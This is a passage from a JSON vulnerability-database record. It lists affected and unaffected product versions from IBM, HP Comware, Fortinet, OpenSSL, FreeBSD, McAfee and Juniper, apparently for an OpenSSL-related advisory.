        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.1"
      },
      {
        "model": "moonshot r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.31"
      },
      {
        "model": "fortirecorder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "1.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.34"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3387"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.1"
      },
      {
        "model": "security network controller 1.0.3352m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.14"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.14"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "forticlient",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.4.0650"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "project openssl 1.0.1n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.0"
      },
      {
        "model": "project openssl 1.0.1o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "ei (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55005)"
      },
      {
        "model": "5510hi (comware r1120",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.16"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.17"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "(comware r2150",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "79007)"
      },
      {
        "model": "project openssl 1.0.0i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "msr1000 (comware r0306p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.3"
      },
      {
        "model": "vsr (comware e0322p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "manageability sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.18"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.4.7"
      },
      {
        "model": "wx5004-ei (comware r2507p44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.15"
      },
      {
        "model": "fortiap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "tivoli workload scheduler for applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.13"
      },
      {
        "model": "email gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.404"
      },
      {
        "model": "4800g (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "(comware r3113p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51307)"
      },
      {
        "model": "project openssl 1.0.0e",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "smb1920 (comware r1112",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.1"
      },
      {
        "model": "10.1-release-p19",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.35"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.010"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "u200s and cs (comware f5123p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.23"
      },
      {
        "model": "(comware r2432p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57007)"
      },
      {
        "model": "fortivoiceos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "msr4000 (comware r0306p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0"
      },
      {
        "model": "hp6000 (comware r2507p44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "(comware r1118p13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58305)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "netezza diagnostics tools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.1.1"
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "2.0.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "rse ru r3303p28.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66005"
      },
      {
        "model": "intelligent management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.2"
      },
      {
        "model": "rpe ru r3303p28.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66005"
      },
      {
        "model": "(comware r5213p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3100v25)"
      },
      {
        "model": "storwize unified",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.4"
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.8"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.17"
      },
      {
        "model": "vcx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.8.19"
      },
      {
        "model": "business process manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.6"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.5"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.1"
      },
      {
        "model": "smartcloud entry appliance fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.21"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.1.3"
      },
      {
        "model": "qradar incident forensics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.8.01.00"
      },
      {
        "model": "ctpview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.3"
      },
      {
        "model": "security identity governance and intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "(comware r7377",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125007)"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.5"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.10"
      },
      {
        "model": "security network controller 1.0.3394m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network controller 1.0.3381m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "50"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.37"
      },
      {
        "model": "imc plat e0403p04",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "project openssl 1.0.0f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "qlogic virtual fabric extension module for ibm bladecenter",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.3.16.00"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.2.3"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "project openssl 1.0.0j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.211"
      },
      {
        "model": "project openssl 1.0.0b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.5"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.6"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3.1"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.16"
      },
      {
        "model": "10.1-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "forticlient",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.3.633"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.3"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.0"
      },
      {
        "model": "(comware r1517p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v19105)"
      },
      {
        "model": "hp830 (comware r3507p51",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational clearquest",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.11"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "505)"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "hsr6800 (comware r3303p28",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.13"
      },
      {
        "model": "fortimanager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.2"
      },
      {
        "model": "forticlient ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.41"
      },
      {
        "model": "forticlient android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.6"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.17"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.7"
      },
      {
        "model": "u200a and m (comware f5123p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "tivoli workload scheduler for applications fp01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "project openssl 1.0.2d",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "sonas",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.1"
      },
      {
        "model": "ctpview 7.1r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "hsr6602 ru r3303p28.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.9"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.1"
      },
      {
        "model": "ctpview 7.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3381"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.0"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.3.6"
      },
      {
        "model": "(comware r1210p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "105005)"
      },
      {
        "model": "project openssl 1.0.0p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.12"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.2"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.13"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.3"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "fortianalyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "worklight consumer edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "nj5000 r1107",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hsr6600 (comware r7103p09",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.8"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.1.3"
      },
      {
        "model": "hsr6800 ru r3303p28.ru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5"
      },
      {
        "model": "project openssl 1.0.0n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.8"
      },
      {
        "model": "tivoli netcool reporter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "(comware r1829p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125005)"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "project openssl 1.0.0r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "qlogic virtual fabric extension module for ibm bladecenter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.3.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3376"
      },
      {
        "model": "qradar incident forensics patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.62"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.12"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.2"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.2"
      },
      {
        "model": "email gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.6.3"
      },
      {
        "model": "msr20-1x (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "msr3000 (comware r0306p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "qradar siem patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.53"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "9500e (comware r1829p02",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "fortidb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "5130hi (comware r1120",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7)"
      },
      {
        "model": "5500si (comware r2221p22",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.25"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.33"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.2.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.2.2"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.12"
      },
      {
        "model": "smartcloud entry appliance fixpac",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "security access manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "fortiadc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "3.2"
      },
      {
        "model": "qradar siem patch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.43"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.1"
      },
      {
        "model": "infosphere master data management standard/advanced edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.4"
      },
      {
        "model": "qradar siem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "msr (comware r2516",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "93x5)"
      },
      {
        "model": "rational clearquest",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.18"
      },
      {
        "model": "websphere mq advanced message security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "-8.0.0.0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.11"
      },
      {
        "model": "10.1-release-p23",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.4"
      },
      {
        "model": "10.1-release-p16",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.11"
      },
      {
        "model": "fortiap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.8"
      },
      {
        "model": "rational requisitepro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.5"
      },
      {
        "model": "ctpview 7.1r1",
        "scope": null,
        "trust": 0.3,
